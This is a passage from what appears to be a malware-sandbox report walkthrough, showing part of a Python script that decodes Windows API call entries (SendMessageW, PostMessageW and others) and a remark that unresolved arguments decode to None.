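            result[entry["ref"]] = (entry["api"], decode_call(entry))
    return result


# Constructed input: API entries copied from the report section above
SAMPLE_LINES = [
    "• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C32255",
    "• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C18E73",
    "• SendMessageW.USER32(?,00000180,00000000,?), ref: 00C18D6B",
    "• SendMessageW.USER32(?,00000182,?,00000000), ref: 00C18DEE",
    "• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C17C82",
    "• PostMessageW.USER32(00000000), ref: 00C459B5",
    "• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C45981",
]

if __name__ == "__main__":
    for ref, (api, name) in annotate(SAMPLE_LINES).items():
        print(f"{ref}: {api} -> {name}")
```

The PostMessageW entry at 00C459B5 shows a single argument because the sandbox could not resolve the rest, so it decodes to None rather than to a guessed message; keep that distinction when reading the listing, since an unresolved argument is not evidence of any particular message.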